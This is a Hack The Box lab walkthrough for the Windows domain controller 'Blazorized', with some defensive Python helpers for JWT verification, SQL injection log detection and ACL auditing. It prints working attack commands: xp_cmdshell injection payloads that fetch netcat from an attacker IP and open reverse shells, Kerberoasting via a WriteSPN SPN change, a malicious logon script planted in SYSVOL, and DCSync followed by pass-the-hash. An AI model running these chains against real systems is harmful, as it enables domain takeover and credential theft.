Blazorized

OS: Windows
Difficulty: Hard
Points: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.216.24 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.129.216.24
Nmap scan report for 10.129.216.24
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 10:00:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-ntlm-info:
|   10.129.216.24\BLAZORIZED:
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-02T07:39:38
|_Not valid after:  2054-07-02T07:39:38
| ms-sql-info:
|   10.129.216.24\BLAZORIZED:
|     Instance name: BLAZORIZED
|     Version:
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
|_ssl-date: 2024-07-02T10:01:42+00:00; 0s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info: 
|   10.129.216.24:49776: 
|     Version: 
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|_    TCP port: 49776
| ms-sql-ntlm-info: 
|   10.129.216.24:49776: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-07-02T10:01:42+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-02T07:39:38
|_Not valid after:  2054-07-02T07:39:38
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

We discover subdomains.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.blazorized.htb" -u http://blazorized.htb -fw 9
admin                   [Status: 200, Size: 2047, Words: 149, Lines: 28, Duration: 155ms]

If we capture the request we discover another subdomain.

http://blazorized.htb/check-updates
api.blazorized.htb

The application uses Blazor: we can see the _framework folder in the debugger.

If we browse to the URL http://blazorized.htb/_framework/ with Burp we find several requests for DLLs and other files.

curl http://blazorized.htb/_framework/blazor.boot.json -o blazor.boot.json
"lazyAssembly": {
      "Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
    }

We download the DLL.

curl http://blazorized.htb/_framework/Blazorized.Helpers.dll -o Blazorized.Helpers.dll

Decompile DLL

Using dotPeek we can decompile the DLL and see the following contents.

    private const long EXPIRATION_DURATION_IN_SECONDS = 60;
    private static readonly string jwtSymmetricSecurityKey = "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";
    private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
    private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
    private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
    private static readonly string superAdminRoleClaimValue = "Super_Admin";
    private static readonly string issuer = "http://api.blazorized.htb";
    private static readonly string apiAudience = "http://api.blazorized.htb";
    private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";

With that we can generate our own token.

We put the token in local storage and access the admin panel.

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIiwiUG9zdHNfR2V0X0FsbCIsIkNhdGVnb3JpZXNfR2V0X0FsbCJdLCJleHAiOjE5MTk5MTkzMzIsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIiLCJpYXQiOjE3MTk5MTk5MjB9.1_mtVuDdMhdI193SFKLZI-ch8YpRg1PUYDUtSSGiQbf76MwI8cbCRvVgri_sJ97fN1t3lIBLVQXB1yP1N3WBzQ
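Why a symmetric signing key shipped inside a client-side DLL is fatal, as an added Python example (not code from the write-up or from the Blazorized application): whoever holds the key mints HS512 tokens that even a correct verifier (alg, signature, iss, aud, exp all checked) accepts, so the only fix is rotating the key and keeping it server-side. The key value is a placeholder; the claim names, issuer and audience come from the decompiled constants and the token above.

```python
import base64
import hashlib
import hmac
import json
import time

# Values from the decompiled Blazorized.Helpers.dll constants above.
ISSUER = "http://api.blazorized.htb"
ADMIN_AUDIENCE = "http://admin.blazorized.htb"
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
# Placeholder: the real jwtSymmetricSecurityKey is deliberately not reproduced.
LEAKED_KEY = b"PLACEHOLDER_jwtSymmetricSecurityKey"


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def superadmin_claims(now, lifetime=60):
    """Claim set the admin dashboard expects; lifetime mirrors EXPIRATION_DURATION_IN_SECONDS."""
    return {EMAIL_CLAIM: "superadmin@blazorized.htb",
            ROLE_CLAIM: ["Super_Admin", "Posts_Get_All", "Categories_Get_All"],
            "iss": ISSUER, "aud": ADMIN_AUDIENCE, "iat": now, "exp": now + lifetime}


def mint_hs512(claims, key):
    """Sign claims in the shape of the token above: HMAC-SHA512 over header.payload."""
    header = _b64url(json.dumps({"alg": "HS512", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha512).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def decode_claims(token):
    """Read claims without trusting them (no signature check); useful on any captured token."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def verify_hs512(token, key, audience, now=None):
    """Return claims only if alg, signature, iss, aud and exp all hold; otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS512":
        return None  # refuse alg confusion ("none", HS256 with another key, ...)
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    claims = json.loads(_b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    if claims.get("iss") != ISSUER or claims.get("aud") != audience or claims.get("exp", 0) <= now:
        return None
    return claims
```

Note that the verifier rejects the token once the key is rotated or when the audience is the API rather than the dashboard, which is exactly what the audience split in the DLL was meant to enforce.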

SQL Injection (MSSQL)

The following URL is vulnerable to SQL injection; since the backend is MSSQL, we can obtain RCE as follows.

http://admin.blazorized.htb/check-duplicate-post-title
'; exec xp_cmdshell 'mkdir c:\temp'-- -
'; exec xp_cmdshell 'curl 10.10.14.149/nc64.exe -o c:\temp\nc.exe'-- -
'; exec xp_cmdshell 'c:\temp\nc.exe 10.10.14.149 1234 -e cmd.exe'-- -

We obtain a reverse shell.
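Detection for the requests above, as an added Python example (not from the write-up): it parses IIS W3C log lines, URL-decodes the query string and flags the quote breakout followed by a stacked statement, the MSSQL procedures that turn an injection into command execution, and the trailing comment terminator. The log lines are constructed and assume the title reaches check-duplicate-post-title as a query parameter named title.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the write-up); the second and
# third requests carry the stacked-query payloads shown above, URL-encoded.
IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-07-02 10:05:12 GET /check-duplicate-post-title title=Welcome+Post 10.10.14.149 200
2024-07-02 10:05:40 GET /check-duplicate-post-title title=%27%3B+exec+xp_cmdshell+%27mkdir+c%3A%5Ctemp%27--+- 10.10.14.149 200
2024-07-02 10:06:03 GET /check-duplicate-post-title title=%27%3B+exec+xp_cmdshell+%27c%3A%5Ctemp%5Cnc.exe+10.10.14.149+1234+-e+cmd.exe%27--+- 10.10.14.149 500
2024-07-02 10:06:30 GET /posts/42 - 10.10.14.7 200
"""

# MSSQL features that give an injection command execution or file/network access.
DANGEROUS_PROCS = re.compile(
    r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|xp_dirtree|xp_fileexist|openrowset|sp_configure)\b",
    re.I)
STACKED = re.compile(r"'\s*;")           # string breakout followed by a new statement
COMMENT_TAIL = re.compile(r"--\s*-?\s*$")  # "-- -" style terminator at the end of the payload


def parse_w3c(text):
    """Yield one dict per request line, keyed by the most recent #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def score_request(entry):
    """Return the list of injection indicators found in the decoded query string."""
    query = unquote_plus(entry.get("cs-uri-query", "-"))
    indicators = []
    if STACKED.search(query):
        indicators.append("stacked-query")
    indicators.extend(p.lower() for p in DANGEROUS_PROCS.findall(query))
    if indicators and COMMENT_TAIL.search(query):
        indicators.append("comment-terminator")
    return indicators


def find_mssql_injection(text):
    """Return (time, uri-stem, client ip, indicators) for every suspicious request."""
    hits = []
    for entry in parse_w3c(text):
        indicators = score_request(entry)
        if indicators:
            hits.append((entry["time"], entry["cs-uri-stem"], entry["c-ip"], indicators))
    return hits
```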

Lateral Movement

We use SharpHound to collect information about the domain.

curl 10.10.14.149/SharpHound.exe -o SharpHound.exe
c:\Temp>SharpHound.exe -c all
2024-07-02T18:42:53.3184630-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-07-02T18:42:53.5528595-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-07-02T18:42:53.5841063-05:00|INFORMATION|Initializing SharpHound at 6:42 PM on 7/2/2024
2024-07-02T18:42:53.7872048-05:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for blazorized.htb : DC1.blazorized.htb
2024-07-02T18:42:53.9122095-05:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-07-02T18:42:54.0998193-05:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-07-02T18:42:54.1467094-05:00|INFORMATION|Producer has finished, closing LDAP channel
2024-07-02T18:42:54.1467094-05:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-07-02T18:43:24.7091439-05:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-07-02T18:43:36.1778228-05:00|INFORMATION|Consumers finished, closing output channel
2024-07-02T18:43:36.2246966-05:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-07-02T18:43:36.3340799-05:00|INFORMATION|Status: 110 objects finished (+110 2.619048)/s -- Using 44 MB RAM
2024-07-02T18:43:36.3340799-05:00|INFORMATION|Enumeration finished in 00:00:42.2309311
2024-07-02T18:43:36.4278399-05:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
 72 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-07-02T18:43:36.4434589-05:00|INFORMATION|SharpHound Enumeration Completed at 6:43 PM on 7/2/2024! Happy Graphing!

We copy the file to our machine.

# Windows
nc -w 5 10.10.14.149 4444 < 20240702184335_BloodHound.zip

# Kali
nc -lvnp 4444 > 20240702184335_BloodHound.zip

Reviewing the contents in BloodHound, we see that the user has WriteSPN permissions over the user RSA_4810.

WriteSPN Abuse

Using PowerView.ps1 we can obtain a hash to crack afterwards. We use the following commands.

curl 10.10.14.149/PowerView.ps1 -o PowerView.ps1
powershell
import-module .\PowerView.ps1

We obtain the Kerberos hash.

Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='doom/test'}
Get-DomainSPNTicket -SPN doom/test
SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : doom/test
TicketByteHexStream  : 

We crack the hash.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:21 DONE (2024-07-02 20:00) 0.04739g/s 678654p/s 678654c/s 678654C/s (alejo)..(Camisha)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

With these credentials we can connect over WinRM.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents>

Privilege Escalation

Running winPEAS we see that the user has write privileges on the following paths.

    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

The user also has write permissions on the following path.

*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts> icacls A32FF3AEAA23
A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(RX,W)
             NT AUTHORITY\Authenticated Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Server Operators:(I)(RX)
             BUILTIN\Server Operators:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Administrators:(I)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

We have write privileges on the A32FF3AEAA23 directory in SYSVOL, which is commonly used for logon scripts and Group Policy data.
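As an added check (not part of the write-up), a small parser for icacls output that flags any principal outside the expected administrative set holding write or modify rights on SYSVOL or NETLOGON content; run over the listing above it reports RSA_4810's (RX,W) on A32FF3AEAA23 and ignores the read-only Authenticated Users and Server Operators entries. The sample input is the page's listing pasted inline, and the parser assumes the object path contains no spaces.

```python
import re

# Sample input: the icacls listing from the write-up, pasted verbatim.
ICACLS_OUTPUT = r"""A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(RX,W)
             NT AUTHORITY\Authenticated Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Server Operators:(I)(RX)
             BUILTIN\Server Operators:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Administrators:(I)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""

# Simple and specific icacls rights that let a principal add or alter files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO", "GW", "GA"}
# Principals expected to hold write rights under SYSVOL/NETLOGON.
TRUSTED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM", "CREATOR OWNER",
           "NT SERVICE\\TrustedInstaller"}


def parse_icacls(text):
    """Yield (path, principal, inheritance flags, rights) for each ACE line.

    An ACE looks like <principal>:(flag)(flag)...(rights); the first ACE of an
    object is prefixed with the object path (assumed to contain no spaces),
    continuation ACEs are indented.
    """
    path = None
    for line in text.splitlines():
        if ":(" not in line:              # blank line or the "Successfully processed" summary
            continue
        if not line[0].isspace():
            path, line = line.split(None, 1)
        principal, _, groups = line.strip().rpartition(":")
        parts = re.findall(r"\(([^)]*)\)", groups)
        yield path, principal, set(parts[:-1]), set(parts[-1].split(","))


def writable_by_untrusted(text, trusted=TRUSTED):
    """Return ACEs granting write/modify rights to principals outside the trusted set."""
    findings = []
    for path, principal, flags, rights in parse_icacls(text):
        effective = rights & WRITE_RIGHTS
        if principal not in trusted and effective:
            findings.append({"path": path, "principal": principal,
                             "rights": sorted(effective), "inherit_only": "IO" in flags})
    return findings
```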

The user SSA_6010 logs on every minute.

SSA_6010 also runs a logon script taken from its scriptPath attribute, \\dc1\NETLOGON\A32FF3AEAA23\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030, which shows that logon scripts are stored in the NETLOGON share.

We create a logon script to obtain a reverse shell.

'c:\temp\nc.exe 10.10.14.149 4444 -e cmd.exe'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\doom.bat -Encoding ASCII
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\doom.bat'

This user is allowed to DCSync, which we use to escalate privileges. We use mimikatz to extract the Administrator user's NTLM hash.

lsadump::dcsync /domain:blazorized.htb /user:Administrator

We connect with that hash over WinRM.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# evil-winrm -i blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>